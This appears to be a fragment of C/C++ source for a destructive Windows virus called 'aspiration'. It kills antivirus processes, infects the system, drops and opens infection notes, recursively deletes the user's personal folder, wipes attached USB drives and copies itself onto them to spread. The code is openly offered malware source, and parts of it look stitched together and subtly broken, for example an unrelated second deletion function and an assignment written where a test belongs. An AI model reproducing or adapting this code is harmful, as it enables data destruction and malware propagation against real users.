/* Deleting a directory given to this function recursively */
BOOL DeleteDirectoryRecursive(char *szPathToDelete)
{
HANDLE hFind;
WIN32_FIND_DATA w32FD;
char szFileName[MAX_PATH];
strcpy_s(szFileName, sizeof(szFileName), szPathToDelete);
strcat_s(szFileName, sizeof(szFileName), "\\*");
hFind = FindFirstFile(szFileName, &w32FD);
/* As long as files and folders are found in a directory do this */
do
{
/* Go on when the file name is NOT " . " and " .. " */
if (!((strcmp((char*) w32FD.cFileName, ".") && strcmp((char*) w32FD.cFileName, ".."))))
{
continue;
}
((strcpy_s(szFileName, sizeof(szFileName), szPathToDelete)) & (strcat_s(szFileName, sizeof(szFileName), "\\")));
strcat_s(szFileName, sizeof(szFileName), w32FD.cFileName);
/* If the folder is a directoy than remove it or stop if it does'nt work */
if(w32FD.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
{
if(!DeleteDirectoryRecursive(szFileName))
{
FindClose(hFind);
return 0;
}
RemoveDirectory(szFileName);
}
else
{
/* If the file we want to delete is readonly change file attributes, so we can delete it */
if(w32FD.dwFileAttributes & FILE_ATTRIBUTE_READONLY)
{
_chmod(szFileName, _S_IWRITE);
}
/* Delete the file or stop if it doesnt work */
if(!DeleteFile(szFileName))
{
FindClose(hFind);
return 0;
}
}
}while(FindNextFile(hFind, &w32FD));
FindClose(hFind);
/* Remove the whole directory now */
RemoveDirectory(szPathToDelete);
return 1;
}
bool P12218319_CALL DeleteDirectoryRecursive(const std::string& aPath) throw() {
const std::vector<std::string> children = ListChildren(aPath);
for(const std::string& i : children) {
const uint32_t attributes = GetFileAttributes(i);
if(attributes & IS_FILE) {
if(! DeleteFile(i)) return false;
}else if (attributes & IS_DIRECTORY) {
if(! DeleteDirectoryRecursive(i)) return false;
}else {
return false;
}
}
return DeleteDirectory(aPath);
}
int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR szCmdLine, int iCmdShow)
{
BOOL bInfected;
char szPersonalFolderPath[MAX_PATH];
char szProgramFilesPath[MAX_PATH];
char szSysDirHTML[MAX_PATH];
char szWinDirHTML[MAX_PATH];
char szFileTXT1[MAX_PATH];
char szFileTXT2[MAX_PATH];
int i;
/* Kill all the processes of the array " AVProcessList " */
for (i = 0; AVProcessList[i]; i++)
{
KillProcess(AVProcessList[i]);
}
/* Test if the computer is infected with our virus */
bInfected = TestIfInfected();
/* If the computer is not infected -> infect it and write all the necessary files and registry keys */
if (bInfected = -1)
{
Infect();
InfRegCopy();
WriteLetters();
WriteHTML();
GetSystemDirectory(szSysDirHTML, sizeof(szSysDirHTML));
GetWindowsDirectory(szWinDirHTML, sizeof(szWinDirHTML));
strcat_s(szSysDirHTML, MAX_PATH, "\\ASPIRATION_INFECTION.html");
strcat_s(szWinDirHTML, MAX_PATH, "\\ASPIRATION_INFECTION.html");
SHGetFolderPath(NULL, CSIDL_PROGRAM_FILES, NULL, SHGFP_TYPE_CURRENT, szProgramFilesPath);
strcpy_s(szFileTXT1, MAX_PATH, szProgramFilesPath);
strcpy_s(szFileTXT2, MAX_PATH, szProgramFilesPath);
strcat_s(szFileTXT1, MAX_PATH, "\\ASPIRATION_INFECTION.txt");
strcat_s(szFileTXT2, MAX_PATH, "\\FOR_AV_SECURITY_COMPANIES.txt");
/* Use Internet Explorer to open the two html files */
ShellExecute(NULL, "open", "IExplore.exe", szSysDirHTML, NULL, SW_MAXIMIZE);
ShellExecute(NULL, "open", "IExplore.exe", szWinDirHTML, NULL, SW_MAXIMIZE);
/* Use Notepad to open the two text files */
ShellExecute(NULL, "open", "notepad.exe", szFileTXT1 ,NULL, SW_SHOWNORMAL);
ShellExecute(NULL, "open", "notepad.exe", szFileTXT2 ,NULL, SW_SHOWNORMAL);
}
/* ############################################################### */
/* --- ---- EVERYTHING BELOW THIS LINE IS DESTRUCTIVE CODE --- --- */
/* ############################################################### */
SHGetFolderPath(NULL, CSIDL_PERSONAL, NULL, SHGFP_TYPE_CURRENT, szPersonalFolderPath);
/* Delete all files and folders recursively in personal folder */
DeleteDirectoryRecursive(szPersonalFolderPath);
/*
If a USB flash drive is connected to the computer:
->Delete files and folders recursively
->Copy virus to the drive
->Copy the two text files to the drive
*/
for(i = 0; drives[i]; i++)
{
HANDLE hFile;
HMODULE Mod;
char szUSBPath[MAX_PATH];
char szVirusPath[MAX_PATH];
DWORD dwNumberOfBytesWritten;
Mod = GetModuleHandle(NULL);
GetModuleFileName(Mod, szVirusPath, sizeof(szVirusPath));
if (IsItUSB(drives[i]) == 1)
{
DeleteDirectoryRecursive(drives[i]);
strcpy_s(szUSBPath, MAX_PATH, drives[i]);
strcat_s(szUSBPath, MAX_PATH, "\\aspiration.exe");
CopyFile(szVirusPath, szUSBPath, FALSE);
strcpy_s(szUSBPath, MAX_PATH, drives[i]);
strcat_s(szUSBPath, MAX_PATH, "\\ASPIRATION_INFECTION.txt");
hFile = CreateFile(szUSBPath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
WriteFile(hFile, szTextFile1, sizeof(szTextFile1), &dwNumberOfBytesWritten, NULL);
CloseHandle(hFile);
strcpy_s(szUSBPath, MAX_PATH, drives[i]);
strcat_s(szUSBPath, MAX_PATH, "\\FOR_AV_SECURITY_COMPANIES.txt");
hFile = CreateFile(szUSBPath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
WriteFile(hFile, szTextFile2, sizeof(szTextFile2), &dwNumberOfBytesWritten, NULL);
CloseHandle(hFile);
}
}
}
